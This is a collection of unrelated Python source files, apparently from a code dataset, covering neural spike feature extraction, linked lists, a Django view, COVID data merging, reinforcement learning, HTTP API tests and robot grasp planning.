features = run_peak_pipeline(recording, peaks, nodes, job_kwargs, job_name='features_from_peaks', squeeze_output=False)
return features
class AmplitudeFeature(PipelineNode):
def __init__(self, recording, name='amplitude_feature', return_output=True, parents=None,
all_channels=False, peak_sign='neg'):
PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
self.all_channels = all_channels
self.peak_sign = peak_sign
self._kwargs.update(dict(all_channels=all_channels, peak_sign=peak_sign))
self._dtype = recording.get_dtype()
def get_dtype(self):
return self._dtype
def compute(self, traces, peaks, waveforms):
if self.all_channels:
if self.peak_sign == 'neg':
amplitudes = np.min(waveforms, axis=1)
elif self.peak_sign == 'pos':
amplitudes = np.max(waveforms, axis=1)
elif self.peak_sign == 'both':
amplitudes = np.max(np.abs(waveforms, axis=1))
else:
if self.peak_sign == 'neg':
amplitudes = np.min(waveforms, axis=(1, 2))
elif self.peak_sign == 'pos':
amplitudes = np.max(waveforms, axis=(1, 2))
elif self.peak_sign == 'both':
amplitudes = np.max(np.abs(waveforms), axis=(1, 2))
return amplitudes
class PeakToPeakFeature(PipelineNode):
def __init__(self, recording, name='ptp_feature', return_output=True, parents=None,
local_radius_um=150., all_channels=True):
PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
self.contact_locations = recording.get_channel_locations()
self.channel_distance = get_channel_distances(recording)
self.neighbours_mask = self.channel_distance < local_radius_um
self.all_channels = all_channels
self._kwargs.update(dict(local_radius_um=local_radius_um, all_channels=all_channels))
self._dtype = recording.get_dtype()
def get_dtype(self):
return self._dtype
def compute(self, traces, peaks, waveforms):
if self.all_channels:
all_ptps = np.ptp(waveforms, axis=1)
else:
all_ptps = np.zeros(peaks.size)
for main_chan in np.unique(peaks['channel_ind']):
idx, = np.nonzero(peaks['channel_ind'] == main_chan)
chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
wfs = waveforms[idx][:, :, chan_inds]
all_ptps[idx] = np.max(np.ptp(wfs, axis=1))
return all_ptps
class PeakToPeakLagsFeature(PipelineNode):
def __init__(self, recording, name='ptp_lag_feature', return_output=True, parents=None,
local_radius_um=150., all_channels=True):
PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
self.all_channels = all_channels
self.local_radius_um = local_radius_um
self.contact_locations = recording.get_channel_locations()
self.channel_distance = get_channel_distances(recording)
self.neighbours_mask = self.channel_distance < local_radius_um
self._kwargs.update(dict(local_radius_um=local_radius_um, all_channels=all_channels))
self._dtype = recording.get_dtype()
def get_dtype(self):
return self._dtype
def compute(self, traces, peaks, waveforms):
if self.all_channels:
all_maxs = np.argmax(waveforms, axis=1)
all_mins = np.argmin(waveforms, axis=1)
all_lags = all_maxs - all_mins
else:
all_lags = np.zeros(peaks.size)
for main_chan in np.unique(peaks['channel_ind']):
idx, = np.nonzero(peaks['channel_ind'] == main_chan)
chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
wfs = waveforms[idx][:, :, chan_inds]
maxs = np.argmax(wfs, axis=1)
mins = np.argmin(wfs, axis=1)
lags = maxs - mins
ptps = np.argmax(np.ptp(wfs, axis=1), axis=1)
all_lags[idx] = lags[np.arange(len(idx)), ptps]
return all_lags
class RandomProjectionsFeature(PipelineNode):
def __init__(self, recording, name='random_projections_feature', return_output=True, parents=None,
projections=None, local_radius_um=150., min_values=None):
PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
self.projections = projections
self.local_radius_um = local_radius_um
self.min_values = min_values
self.contact_locations = recording.get_channel_locations()
self.channel_distance = get_channel_distances(recording)
self.neighbours_mask = self.channel_distance < local_radius_um
self._kwargs.update(dict(projections=projections, local_radius_um=local_radius_um, min_values=min_values))
self._dtype = recording.get_dtype()
def get_dtype(self):
return self._dtype
def compute(self, traces, peaks, waveforms):
all_projections = np.zeros((peaks.size, self.projections.shape[1]), dtype=self._dtype)
for main_chan in np.unique(peaks['channel_ind']):
idx, = np.nonzero(peaks['channel_ind'] == main_chan)
chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
local_projections = self.projections[chan_inds, :]
wf_ptp = (waveforms[idx][:, :, chan_inds]).ptp(axis=1)
if self.min_values is not None:
wf_ptp = (wf_ptp/self.min_values[chan_inds])**4
denom = np.sum(wf_ptp, axis=1)
mask = denom != 0
all_projections[idx[mask]] = np.dot(wf_ptp[mask], local_projections)/(denom[mask][:, np.newaxis])
return all_projections
class RandomProjectionsEnergyFeature(PipelineNode):
def __init__(self, recording, name='random_projections_energy_feature', return_output=True, parents=None,
projections=None, local_radius_um=150., min_values=None):
PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
self.contact_locations = recording.get_channel_locations()
self.channel_distance = get_channel_distances(recording)
self.neighbours_mask = self.channel_distance < local_radius_um
self.projections = projections
self.min_values = min_values
self.local_radius_um = local_radius_um
self._kwargs.update(dict(projections=projections, min_values=min_values, local_radius_um=local_radius_um))
self._dtype = recording.get_dtype()
def get_dtype(self):
return self._dtype
def compute(self, traces, peaks, waveforms):
all_projections = np.zeros((peaks.size, self.projections.shape[1]), dtype=self._dtype)
for main_chan in np.unique(peaks['channel_ind']):
idx, = np.nonzero(peaks['channel_ind'] == main_chan)
chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
local_projections = self.projections[chan_inds, :]
energies = np.linalg.norm(waveforms[idx][:, :, chan_inds], axis=1)
if self.min_values is not None:
energies = (energies/self.min_values[chan_inds])**4
denom = np.sum(energies, axis=1)
mask = denom != 0
all_projections[idx[mask]] = np.dot(energies[mask], local_projections)/(denom[mask][:, np.newaxis])
return all_projections
class StdPeakToPeakFeature(PipelineNode):
def __init__(self, recording, name='std_ptp_feature', return_output=True, parents=None,
local_radius_um=150.):
PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
self.contact_locations = recording.get_channel_locations()
self.channel_distance = get_channel_distances(recording)
self.neighbours_mask = self.channel_distance < local_radius_um
self._kwargs.update(dict(local_radius_um=local_radius_um))
self._dtype = recording.get_dtype()
def get_dtype(self):
return self._dtype
def compute(self, traces, peaks, waveforms):
all_ptps = np.zeros(peaks.size)
for main_chan in np.unique(peaks['channel_ind']):
idx, = np.nonzero(peaks['channel_ind'] == main_chan)
chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
wfs = waveforms[idx][:, :, chan_inds]
all_ptps[idx] = np.std(np.ptp(wfs, axis=1), axis=1)
return all_ptps
class GlobalPeakToPeakFeature(PipelineNode):
def __init__(self, recording, name='global_ptp_feature', return_output=True, parents=None,
local_radius_um=150.):
PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
self.contact_locations = recording.get_channel_locations()
self.channel_distance = get_channel_distances(recording)
self.neighbours_mask = self.channel_distance < local_radius_um
self._kwargs.update(dict(local_radius_um=local_radius_um))
self._dtype = recording.get_dtype()
def get_dtype(self):
return self._dtype
def compute(self, traces, peaks, waveforms):
all_ptps = np.zeros(peaks.size)
for main_chan in np.unique(peaks['channel_ind']):
idx, = np.nonzero(peaks['channel_ind'] == main_chan)
chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
wfs = waveforms[idx][:, :, chan_inds]
all_ptps[idx] = np.max(wfs, axis=(1, 2)) - np.min(wfs, axis=(1, 2))
return all_ptps
class KurtosisPeakToPeakFeature(PipelineNode):
def __init__(self, recording, name='kurtosis_ptp_feature', return_output=True, parents=None,
local_radius_um=150.):
PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
self.contact_locations = recording.get_channel_locations()
self.channel_distance = get_channel_distances(recording)
self.neighbours_mask = self.channel_distance < local_radius_um
self._kwargs.update(dict(local_radius_um=local_radius_um))
self._dtype = recording.get_dtype()
def get_dtype(self):
return self._dtype
def compute(self, traces, peaks, waveforms):
all_ptps = np.zeros(peaks.size)
import scipy
for main_chan in np.unique(peaks['channel_ind']):
idx, = np.nonzero(peaks['channel_ind'] == main_chan)
chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
wfs = waveforms[idx][:, :, chan_inds]
all_ptps[idx] = scipy.stats.kurtosis(np.ptp(wfs, axis=1), axis=1)
return all_ptps
class EnergyFeature(PipelineNode):
def __init__(self, recording, name='energy_feature', return_output=True, parents=None,
local_radius_um=50.):
PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
self.contact_locations = recording.get_channel_locations()
self.channel_distance = get_channel_distances(recording)
self.neighbours_mask = self.channel_distance < local_radius_um
self._kwargs.update(dict(local_radius_um=local_radius_um))
def get_dtype(self):
return np.dtype('float32')
def compute(self, traces, peaks, waveforms):
energy = np.zeros(peaks.size, dtype='float32')
for main_chan in np.unique(peaks['channel_ind']):
idx, = np.nonzero(peaks['channel_ind'] == main_chan)
chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
wfs = waveforms[idx][:, :, chan_inds]
energy[idx] = np.linalg.norm(wfs, axis=(1, 2)) / chan_inds.size
return energy
_features_class = {
'amplitude': AmplitudeFeature,
'ptp' : PeakToPeakFeature,
'center_of_mass' : LocalizeCenterOfMass,
'monopolar_triangulation' : LocalizeMonopolarTriangulation,
'energy' : EnergyFeature,
'std_ptp' : StdPeakToPeakFeature,
'kurtosis_ptp' : KurtosisPeakToPeakFeature,
'random_projections_ptp' : RandomProjectionsFeature,
'random_projections_energy' : RandomProjectionsEnergyFeature,
'ptp_lag' : PeakToPeakLagsFeature,
'global_ptp' : GlobalPeakToPeakFeature
} |
4,372 | 599310cfd05be28445535bc72251128ed72a9069 | class Node:
def __init__(self, value, next=None):
self.value = value
self.next = next
def __str__(self):
values = []
iter = self
while iter != None:
values.append(iter.value)
iter = iter.next
return ' -> '.join(values)
@staticmethod
def makelist(values):
node = None
for i in range(len(values)-1, -1, -1):
node = Node(values[i], node)
return node
def reverse(node, s, f):
dummy = Node(0, node)
iter = node
start = dummy
end = node
rstart = node
rend = node
i = 1
if s == f: return node
while i < s:
start = iter
if iter != None:
iter = iter.next
else:
return node
i += 1
rstart = iter
prev = iter
if iter == None: return node
next = iter.next
while i < f:
curr = next
if next != None:
next = next.next
else:
return node
curr.next = prev
prev = curr
i += 1
rend = prev
end = next
start.next = rend
rstart.next = end
return dummy.next
values = input('Enter a list: ').split(',')
s, f = map(lambda x: int(x), input('Enter start and finish: ').split(','))
node = Node.makelist(values)
print(node)
print(reverse(node, s, f))
|
4,373 | e35a106a3852a7a004fdae6819d4075e1fe929d6 | __author__ = 'Orka'
from movie_list import MovieList
from movie_random import MovieRandom
from remove_chosen_movie_from_list import RemoveChosenMovieFromList
from save_list_to_CSV import SaveListToCSV
from length_limit import LengthLimit
file_name = 'cinema.csv'
function = 'r+'
filename_save = 'cinema.csv'
function_save = 'w'
class LaunchMovieLottery(object):
def __init__(self, limit_low=None, limit_high=None):
self.limit_low = limit_low
self.limit_high = limit_high
self.full_list = None
def movie_list(self):
# creates movies list without sequels
movie_list = MovieList(file_name, function)
self.return_movie_list = movie_list.return_movie_list()
self.full_list = movie_list.return_full_list()
return [self.return_movie_list, self.full_list]
def limit_list(self):
self.movie_list()
# limit the movie_list - returns list of movies limited to the specified length
limit_length = LengthLimit(self.return_movie_list, self.limit_low, self.limit_high)
self.shorten_list = limit_length.return_asked_length()
# returns: 'No movie of this length.'
def return_movie(self):
self.limit_list()
# draw a movie from movie list and print it
movie_random = MovieRandom(self.shorten_list)
self.temp_movie_random = movie_random.return_random_movie()
return self.temp_movie_random
def remove_and_save(self, the_movie):
full_list = self.movie_list()[1]
try:
# remove chosen movie from movie list and allow the next movie in the series in next lottery
remove = RemoveChosenMovieFromList(the_movie, full_list)
new_movie_list = remove.remove_movie()
# save to CSV
save_doc = SaveListToCSV(new_movie_list, filename_save, function_save)
save_doc.save_file()
except ValueError:
# Movie not exists
pass
|
4,374 | e3fe77867926d9d82963c8125048148de6998e2b | from enum import Enum
class ImageTaggingChoice(str, Enum):
Disabled = "disabled",
Basic = "basic",
Enhanced = "enhanced",
UnknownFutureValue = "unknownFutureValue",
|
4,375 | 4c8e3c21dd478606cf09f2e97dc9deed6597dae5 | import hashlib
import sys
def getHashcode(string):
for i in range(10000000000):
hash_md5 = hashlib.md5(str(i).encode('utf-8'))
res = hash_md5.hexdigest()
if res[0:len(string)] == string:
print(i)
exit()
if __name__ == '__main__':
getHashcode(sys.argv[1]) |
4,376 | c3ecac1c0facbf6f0905bb03fd337a7f4f5bbeff | from django.shortcuts import render
from .models import Votings
from .serializers import VotingsSerializer
from rest_framework.response import Response
from rest_framework import status
from rest_framework.decorators import api_view
import requests, json
@api_view(['GET'])
def votings(request):
votings = Votings.objects.all()
if votings:
return Response({}, status=status.HTTP_404_NOT_FOUND)
else:
serializer = VotingsSerializer(votings)
r = requests.get('https://api.myjson.com/bins/17w6e1', serializer)
data = json.loads(r.text)
return Response(data, status=status.HTTP_201_CREATED)
|
4,377 | c60971b3b0649fce8c435813de4a738f4eacda27 | import pandas as pd
import notification
def modify(nyt_url, jh_url):
# read data from both sources into a dataframe
# remove unwanted data, formats, and filters
# join dataframes on index
try:
nyt_df = pd.read_csv(nyt_url,
header=0,
names=['Date', 'Cases', 'Deaths'],
dtype={'Cases': 'Int64', 'Deaths': 'Int64'})
nyt_df['Date'] = pd.to_datetime(nyt_df['Date'], format="%Y-%m-%d")
except:
alert = "Error with NYT link"
notification.send_sns(alert)
print(alert)
try:
jh_df = pd.read_csv(jh_url,
usecols=['Date', 'Country/Region', 'Recovered'],
dtype={'Recovered': 'Int64'},
encoding='utf8').dropna()
jh_df.rename(columns={'Country/Region': 'Country'}, inplace=True)
jh_df['Date'] = pd.to_datetime(jh_df['Date'], format="%Y-%m-%d")
except:
alert = "Error with JH link"
notification.send_sns(alert)
print(alert)
try:
jh_us_filter = jh_df[jh_df.Country == 'US']
covid_df = nyt_df.set_index('Date').join(
jh_us_filter.set_index('Date')).dropna()
covid_df.reset_index(inplace=True)
covid_df['Date'] = covid_df['Date'].dt.strftime('%Y-%m-%d')
return covid_df
except:
alert = "Error joining data"
notification.send_sns(alert)
print(alert)
|
4,378 | eca4abf706fd094a40fdfc8ea483d71b0a018ce9 |
import sys
from .csvtable import *
from .utils import *
from .reporter import Reporter
class ColumnKeyVerifier:
def __init__(self):
self.keys = {}
def prologue(self, table_name, header):
if 0 == len(header):
return False
# 키는 첫번째 컬럼에만 설정 가능하다.
return header[0].is_key()
def epilogue(self):
pass
def visit(self, header, columns):
key = int(columns[0])
if key in self.keys:
Reporter.error(f'중복된 키({key})가 존재합니다.')
self.keys[key] = True
return True
|
4,379 | 01626772b0f47987157e9f92ba2ce66a0ec2dcb4 | # socket_address_packing.py
import binascii
import socket
import struct
import sys
for string_address in ['192.168.1.1', '127.0.0.1']:
packed = socket.inet_aton(string_address)
print('Originale :', string_address)
print('Impacchettato:', binascii.hexlify(packed))
print('Spacchettato :', socket.inet_ntoa(packed))
print()
|
4,380 | 64ed3c512894902f85d619020b78338e228dddb6 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# FISL Live
# =========
# Copyright (c) 2010, Triveos Tecnologia Ltda.
# License: AGPLv3
from os.path import *
from datetime import datetime
from google.appengine.api import users
from google.appengine.ext import db
from google.appengine.ext import webapp
from google.appengine.ext.webapp import util
from google.appengine.ext.webapp import template
# from GAE Samples (to serialize models to JSON)
import json
# from gaeutilities.appspot.com
from appengine_utilities import sessions
class Message(db.Model):
author = db.UserProperty()
content = db.StringProperty(multiline=True)
date = db.DateTimeProperty(auto_now=True, auto_now_add=True)
class Page(webapp.RequestHandler):
def get(self):
if users.get_current_user():
url = users.create_logout_url(self.request.uri)
linktext = 'Logout'
user = users.get_current_user()
else:
url = users.create_login_url(self.request.uri)
linktext = 'Login'
user = "Anonymous Coward"
path = join(dirname(__file__), 'index.html')
self.response.out.write(template.render(path, locals()))
def post(self):
content = self.request.get('content')
if content:
message = Message()
if users.get_current_user():
message.author = users.get_current_user()
message.content = self.request.get('content')
message.put()
self.redirect("/")
class Messages(webapp.RequestHandler):
def get(self, mode=""):
messages_query = Message.all().order('date')
session = sessions.Session()
if mode != "/all":
if 'last' in session:
messages_query.filter("date >", session['last'])
session["last"] = datetime.utcnow()
result = json.encode(messages_query.fetch(20))
self.response.headers['Content-Type'] = 'application/json; charset=utf-8'
self.response.out.write(result)
if __name__ == "__main__":
application = webapp.WSGIApplication([
('/', Page),
('/messages(.*)', Messages),
], debug=True)
util.run_wsgi_app(application)
# vim:ts=4:sw=4:et:sm:si:ai |
4,381 | 952f8341f0fcbe6f3f3d1075ce345e61967a4336 | from setuptools import setup
setup(name='gym_asset_allocation',
version='0.0.1',
install_requires=['gym','numpy','pandas','quandl'] # And any other dependencies
) |
4,382 | e1ab4b034c949b8158c6ccc1e8e3f4a960a38c72 | import torch.nn as nn
import torch
from torch.distributions.categorical import Categorical
import torch.nn.functional as F
from torch.optim import Adam
import gym
import numpy as np
Device = torch.device("cuda:0")
class ActorCriticNet(nn.Module):
def __init__(self, observation_space, action_space,
hidden_sizes=[32,32], activation=nn.Tanh):
super().__init__()
obs_dim = observation_space.shape[0]
action_dim = action_space.n
self.base_net = nn.Sequential(
nn.Linear(obs_dim, hidden_sizes[0]),
# nn.Linear(hidden_sizes[0], hidden_sizes[1]),
)
self.pi = nn.Linear(hidden_sizes[1], action_dim)
self.vf = nn.Linear(hidden_sizes[1],1)
self.to(Device)
def forward(self, obs):
obs = torch.Tensor(obs).to(Device)
x = F.relu(self.base_net(obs))
action_logits = F.softmax(self.pi(x), dim=-1)
value = self.vf(x)
return action_logits, value
class Agent(object):
def __init__(self, model=None, lr=1e-2, gamma=0.99):
self.gamma = gamma
self.AC = model
self.optimizer = Adam(AC.parameters(), lr=lr)
self.logp_as = []
self.values = []
self.rewards = []
def choose_action(self, obs):
action_logits, value = self.AC(obs)
distribution = Categorical(action_logits)
action = distribution.sample()
self.logp_as.append(distribution.log_prob(action))
self.values.append(value)
return action.item()
def learn(self):
R = 0
policy_losses = []
value_losses = []
returns = []
for r in self.rewards[::-1]:
R = r + self.gamma * R
returns.insert(0, R)
returns = torch.tensor(returns).to(Device)
returns = (returns - returns.mean()) / (returns.std() + 0.00001)
for logp_a, value, R in zip(self.logp_as, self.values, returns):
advantage = R - value.item()
# calculate actor (policy) loss
policy_losses.append(-logp_a * advantage)
# calculate critic (value) loss using L1 smooth loss
value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).to(Device)))
self.optimizer.zero_grad()
loss = torch.stack(policy_losses).sum() + torch.stack(value_losses).sum()
loss.backward(retain_graph=True)
self.optimizer.step()
self.rewards = []
self.values = []
self.logp_as = []
# Build env
env = gym.make('CartPole-v1')
state = env.reset()
# Learning setting
lr = 3e-2
EPISODES=30000
GAMMA = 0.99
hidden_sizes = [128,128]
show_every = 100
AC = ActorCriticNet(env.observation_space, env.action_space, hidden_sizes)
agent = Agent(AC, lr=lr, gamma=GAMMA)
for episode in range(EPISODES):
# For every episode init
done = False
obs = env.reset()
I = 1
T = 0
# Logs
episode_reward = 0
running_reward = 0
if episode % show_every == 0:
is_render = True
else:
is_render = False
while not done:
# Render
if is_render:
env.render("human")
# Predict action and value
action = agent.choose_action(obs)
# Step the env
next_obs, reward, done, _ = env.step(action)
# Update obs
obs = next_obs
agent.rewards.append(reward)
T += 1
# Logs
episode_reward += reward
# Learn once
agent.learn()
# Update cumulative reward
running_reward = 0.05 * episode_reward + (1 - 0.05) * running_reward
print(f"episode_{episode} \t ep_reward = {episode_reward} \t ep_len = {T}")
if running_reward > env.spec.reward_threshold:
print("Solved! Running reward is now {} and "
"the last episode runs to {} time steps!".format(running_reward, T))
break
|
4,383 | c22b37bff74de7ea99f2009652dd00e57bb316b8 | '''
HTTP Test for channel details
'''
import sys
sys.path.append('..')
from json import load, dumps
import urllib.request
import urllib.parse
import pytest
PORT_NUMBER = '5204'
BASE_URL = 'http://127.0.0.1:' + PORT_NUMBER
#BASE_URL now is 'http://127.0.0.1:5321'
@pytest.fixture
def register_loginx2_create_invite():
'''
Registers, logs in 2 users, creates new channel
'''
# RESET
req = urllib.request.Request(
f'{BASE_URL}/workspace/reset',
headers={'Content-Type': 'application/json'},
method='POST'
)
load(urllib.request.urlopen(req))
# REGISTER user_1
register_info_1 = dumps({
'email': 'z5209488@unsw.edu.au',
'password': 'enigma',
'name_first': 'Alan',
'name_last': 'Turing'
}).encode('utf-8')
req = urllib.request.Request(
f'{BASE_URL}/auth/register',
data=register_info_1,
headers={'Content-Type': 'application/json'},
method='POST'
)
load(urllib.request.urlopen(req))
# REGISTER user_2
register_info_2 = dumps({
'email': 'z5432455@unsw.edu.au',
'password': 'lovepassword',
'name_first': 'Ada',
'name_last': 'Lovelace'
}).encode('utf-8')
req = urllib.request.Request(
f'{BASE_URL}/auth/register',
data=register_info_2,
headers={'Content-Type': 'application/json'},
method='POST'
)
load(urllib.request.urlopen(req))
# Login user_1
login_info = dumps({
'email': 'z5209488@unsw.edu.au',
'password': 'enigma'
}).encode('utf-8')
req = urllib.request.Request(
f'{BASE_URL}/auth/login',
data=login_info,
headers={'Content-Type': 'application/json'},
method='POST'
)
# Login user_2
login_info = dumps({
'email': 'z5432455@unsw.edu.au',
'password': 'lovepassword'
}).encode('utf-8')
req = urllib.request.Request(
f'{BASE_URL}/auth/login',
data=login_info,
headers={'Content-Type': 'application/json'},
method='POST'
)
load(urllib.request.urlopen(req))
#return payload
user_1_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMSJ9.N0asY15U0QBAYTAzxGAvdkuWG6CyqzsR_rvNQtWBmLg\''
#user_2_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMiJ9.UNGv0HfSeyM4FtXkAc4HfuOl_HyNLFmRMeLx_4c0Ryg\''
# user_1 creates a public channel
channel_info = dumps({
'token': user_1_token,
'name': 'a channel',
'is_public': True
}).encode('utf-8')
req = urllib.request.Request(
f'{BASE_URL}/channels/create',
data=channel_info,
headers={'Content-Type': 'application/json'},
method='POST'
)
load(urllib.request.urlopen(req))
# user_2 join user_1's channel
join_info = dumps({
'token': user_1_token,
'channel_id': 1,
'u_id': 2
}).encode('utf-8')
req = urllib.request.Request(
f'{BASE_URL}/channel/invite',
data=join_info,
headers={'Content-Type': 'application/json'},
method='POST'
)
load(urllib.request.urlopen(req))
def test_details_basic(register_loginx2_create_invite):
'''
This test should pass with no issues
'''
user_1_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMSJ9.N0asY15U0QBAYTAzxGAvdkuWG6CyqzsR_rvNQtWBmLg\''
#user_2_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMiJ9.UNGv0HfSeyM4FtXkAc4HfuOl_HyNLFmRMeLx_4c0Ryg\''
# Get channels details
queryString = urllib.parse.urlencode({
'token': user_1_token,
'channel_id': 1
})
payload = load(urllib.request.urlopen(f"{BASE_URL}/channel/details?{queryString}"))
#payload = load(urllib.request.urlopen(req))
assert payload['name'] == 'a channel'
assert payload['owner_members'] == [{"u_id": 1, "name_first": "Alan", "name_last": "Turing"}]
def test_invalid_channelID(register_loginx2_create_invite):
'''
Channel ID is not a valid channel
'''
user_1_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMSJ9.N0asY15U0QBAYTAzxGAvdkuWG6CyqzsR_rvNQtWBmLg\''
#user_2_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMiJ9.UNGv0HfSeyM4FtXkAc4HfuOl_HyNLFmRMeLx_4c0Ryg\''
queryString = urllib.parse.urlencode({
'token': user_1_token,
'channel_id': 50
})
with pytest.raises(urllib.error.HTTPError):
urllib.request.urlopen(f"{BASE_URL}/channel/details?{queryString}")
#load(urllib.request.urlopen(req))
def test_unauthorised_user(register_loginx2_create_invite):
'''
Authorised user is not a member of channel with channel_id
'''
register_info_2 = dumps({
'email': 'z5454545@unsw.edu.au',
'password': 'testPassword',
'name_first': 'Test',
'name_last': 'User'
}).encode('utf-8')
req = urllib.request.Request(
f'{BASE_URL}/auth/register',
data=register_info_2,
headers={'Content-Type': 'application/json'},
method='POST'
)
load(urllib.request.urlopen(req))
login3_info = dumps({
'email': 'z5454545@unsw.edu.au',
'password': 'testPassword'
}).encode('utf-8')
req = urllib.request.Request(
f'{BASE_URL}/auth/login',
data=login3_info,
headers={'Content-Type': 'application/json'},
method='POST'
)
user_3_token = 'b\'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1X2lkIjoiMyJ9.hnzKv5QKl78L2jWvtB8w9kcxZHo1UFxGN5shF7HBK0Y\''
queryString = urllib.parse.urlencode({
'token': user_3_token,
'channel_id': 1
})
with pytest.raises(urllib.error.HTTPError):
urllib.request.urlopen(f"{BASE_URL}/channel/details?{queryString}")
|
4,384 | 738e6d4d608aa977094420a432cbd8a05ea8a1b5 | import math
import numpy as np
import basis.robot_math as rm
import grasping.annotation.utils as gu
from scipy.spatial import cKDTree
def plan_contact_pairs(objcm,
max_samples=100,
min_dist_between_sampled_contact_points=.005,
angle_between_contact_normals=math.radians(160),
toggle_sampled_points=False):
"""
find the contact pairs using rayshooting
the finally returned number of contact pairs may be smaller than the given max_samples due to the min_dist constraint
:param angle_between_contact_normals:
:param toggle_sampled_points
:return: [[contact_p0, contact_p1], ...]
author: weiwei
date: 20190805, 20210504
"""
contact_points, face_ids = objcm.sample_surface(nsample=max_samples,
radius=min_dist_between_sampled_contact_points / 2)
contact_normals = objcm.objtrm.face_normals[face_ids]
contact_pairs = []
tree = cKDTree(contact_points)
near_history = np.array([0] * len(contact_points), dtype=bool)
for i, contact_p0 in enumerate(contact_points):
if near_history[i]: # if the point was previous near to some points, ignore
continue
contact_n0 = contact_normals[i]
hit_points, hit_normals = objcm.ray_hit(contact_p0 - contact_n0 * .001, contact_p0 - contact_n0 * 100)
if len(hit_points) > 0:
for contact_p1, contact_n1 in zip(hit_points, hit_normals):
if np.dot(contact_n0, contact_n1) < -math.cos(angle_between_contact_normals):
near_points_indices = tree.query_ball_point(contact_p1, min_dist_between_sampled_contact_points)
if len(near_points_indices):
for npi in near_points_indices:
if np.dot(contact_normals[npi], contact_n1) > math.cos(angle_between_contact_normals):
near_history[npi] = True
contact_pairs.append([[contact_p0, contact_n0], [contact_p1, contact_n1]])
if toggle_sampled_points:
return contact_pairs, contact_points
return contact_pairs
def plan_grasps(hnd_s,
objcm,
angle_between_contact_normals=math.radians(160),
openning_direction = 'loc_x',
rotation_interval=math.radians(22.5),
max_samples=100,
min_dist_between_sampled_contact_points=.005,
contact_offset=.002):
"""
:param objcm:
:param hnd_s:
:param angle_between_contact_normals:
:param openning_direction: 'loc_x' or 'loc_y' depending on gripper types
:param rotation_granularity:
:param max_samples:
:param min_dist_between_sampled_contact_points:
:param contact_offset: offset at the cotnact to avoid being closely in touch with object surfaces
:return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]
"""
contact_pairs = plan_contact_pairs(objcm,
max_samples=max_samples,
min_dist_between_sampled_contact_points=min_dist_between_sampled_contact_points,
angle_between_contact_normals=angle_between_contact_normals)
grasp_info_list = []
import modeling.geometric_model as gm
for i, cp in enumerate(contact_pairs):
print(f"{i} of {len(contact_pairs)} done!")
contact_p0, contact_n0 = cp[0]
contact_p1, contact_n1 = cp[1]
contact_center = (contact_p0 + contact_p1) / 2
jaw_width = np.linalg.norm(contact_p0 - contact_p1) + contact_offset * 2
if jaw_width > hnd_s.jawwidth_rng[1]:
continue
if openning_direction == 'loc_x':
jaw_center_x = contact_n0
jaw_center_z = rm.orthogonal_vector(contact_n0)
jaw_center_y = np.cross(jaw_center_z, jaw_center_x)
elif openning_direction == 'loc_y':
jaw_center_y = contact_n0
jaw_center_z = rm.orthogonal_vector(contact_n0)
else:
raise ValueError("Openning direction must be loc_x or loc_y!")
grasp_info_list += gu.define_grasp_with_rotation(hnd_s,
objcm,
gl_jaw_center_pos=contact_center,
gl_jaw_center_z=jaw_center_z,
gl_jaw_center_y=jaw_center_y,
jaw_width=jaw_width,
gl_rotation_ax=contact_n0,
rotation_interval=rotation_interval,
toggle_flip=True)
return grasp_info_list
def write_pickle_file(objcm_name, grasp_info_list, root=None, file_name='preannotated_grasps.pickle', append=False):
if root is None:
root = './'
gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=file_name, append=append)
def load_pickle_file(objcm_name, root=None, file_name='preannotated_grasps.pickle'):
if root is None:
root = './'
return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)
if __name__ == '__main__':
import os
import basis
import robot_sim.end_effectors.grippers.xarm_gripper.xarm_gripper as xag
import modeling.collision_model as cm
import visualization.panda.world as wd
base = wd.World(cam_pos=[.5, .5, .3], lookat_pos=[0, 0, 0])
gripper_s = xag.XArmGripper(enable_cc=True)
objpath = os.path.join(basis.__path__[0], 'objects', 'block.stl')
objcm = cm.CollisionModel(objpath)
objcm.attach_to(base)
objcm.show_localframe()
grasp_info_list = plan_grasps(gripper_s, objcm, min_dist_between_sampled_contact_points=.02)
for grasp_info in grasp_info_list:
jaw_width, gl_jaw_center_pos, gl_jaw_center_rotmat, hnd_pos, hnd_rotmat = grasp_info
gic = gripper_s.copy()
gic.fix_to(hnd_pos, hnd_rotmat)
gic.jaw_to(jaw_width)
print(hnd_pos, hnd_rotmat)
gic.gen_meshmodel().attach_to(base)
base.run()
|
4,385 | a55d1286485e66a64aa78259ad1b1922c5c4c831 | from typing import *
class Solution:
def isMonotonic(self, A: List[int]) -> bool:
flag= 0
for i in range(1,len(A)):
diff=A[i]-A[i-1]
if diff*flag<0:
return False
if flag==0:
flag=diff
return True
sl=Solution()
inp=[1,2,2,2,1]
